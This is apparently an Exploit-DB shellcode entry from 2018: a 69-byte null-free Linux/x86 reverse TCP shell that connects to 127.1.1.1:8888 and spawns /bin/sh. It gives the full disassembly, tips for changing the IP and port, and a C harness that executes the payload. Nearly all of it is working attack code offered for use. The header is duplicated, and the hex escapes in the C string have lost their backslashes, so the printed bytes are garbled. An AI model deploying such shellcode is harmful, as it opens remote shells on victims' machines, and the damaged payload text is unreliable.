/*
Title: Linux/x86 - Reverse TCP Shell (/bin/sh) (127.1.1.1:8888/TCP) Null-Free Shellcode (69 bytes)
Description: Smallest /bin/sh Reverse TCP Shellcode(Null Free, No Register Pollution /*
Title: Linux/x86 - Reverse TCP Shell (/bin/sh) (127.1.1.1:8888/TCP) Null-Free Shellcode (69 bytes)
Description: Smallest /bin/sh Reverse TCP Shellcode(Null Free, No Register Pollution Required)
Date : 4/Jan/2018
Author: Nipun Jaswal (@nipunjaswal) ; SLAE-1080

Details:
Smallest /bin/sh based Null & Register Pollution Free x86/linux Reverse Shell TCP (127.1.1.1:8888)( 69 Bytes )
You can modify the port and IP by changing the values for IP and PORT

Note:
If You are compiling the C file itself and dont care about Bad Chars, You can reduce 2 more bytes:

Change the following lines of code:
push word 0xb822
push word 2
To:
push 0xb8220002 ---> This will make the length of the Shellcode to 67 Bytes
*/
/*Disassembly of section .text:

08048060 <_start>:
8048060: 31 db xor ebx,ebx
8048062: 53 push ebx
8048063: 43 inc ebx
8048064: 53 push ebx
8048065: 6a 02 push 0x2
8048067: 89 e1 mov ecx,esp
8048069: 6a 66 push 0x66
804806b: 58 pop eax
804806c: cd 80 int 0x80
804806e: 93 xchg ebx,eax
804806f: 59 pop ecx

08048070 <loop>:
8048070: b0 3f mov al,0x3f
8048072: cd 80 int 0x80
8048074: 49 dec ecx
8048075: 79 f9 jns 8048070 <loop>
8048077: 68 7f 01 01 01 push 0x101017f
804807c: 66 68 22 b8 pushw 0xb822
8048080: 66 6a 02 pushw 0x2
8048083: 89 e1 mov ecx,esp
8048085: b0 66 mov al,0x66
8048087: 50 push eax
8048088: 51 push ecx
8048089: 53 push ebx
804808a: b3 03 mov bl,0x3
804808c: 89 e1 mov ecx,esp
804808e: cd 80 int 0x80
8048090: 52 push edx
8048091: 68 2f 2f 73 68 push 0x68732f2f
8048096: 68 2f 62 69 6e push 0x6e69622f
804809b: 89 e3 mov ebx,esp
804809d: 52 push edx
804809e: 53 push ebx
804809f: 89 e1 mov ecx,esp
80480a1: b0 0b mov al,0xb
80480a3: cd 80 int 0x80


EDB Note: Source ~ http://www.nipunjaswal.com/2018/01/tale-of-the-smallest-shellcode.html
*/

#include<stdio.h>
#include<string.h>
#define IP "x7fx01x01x01"
#define PORT "x22xb8"
int main(int argc, char* argv[])
{
unsigned char code[] =
"x31xdbx53x43x53x6ax02x89xe1x6a"
"x66x58xcdx80x93x59xb0x3fxcdx80"
"x49x79xf9x68"
IP
"x66x68"
PORT
"x66x6ax02x89xe1xb0x66x50"
"x51x53xb3x03x89xe1xcdx80x52x68"
"x2fx2fx73x68x68x2fx62x69x6ex89"
"xe3x52x53x89xe1xb0x0bxcdx80";
printf(" Shellcode 1 Length: %d ", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}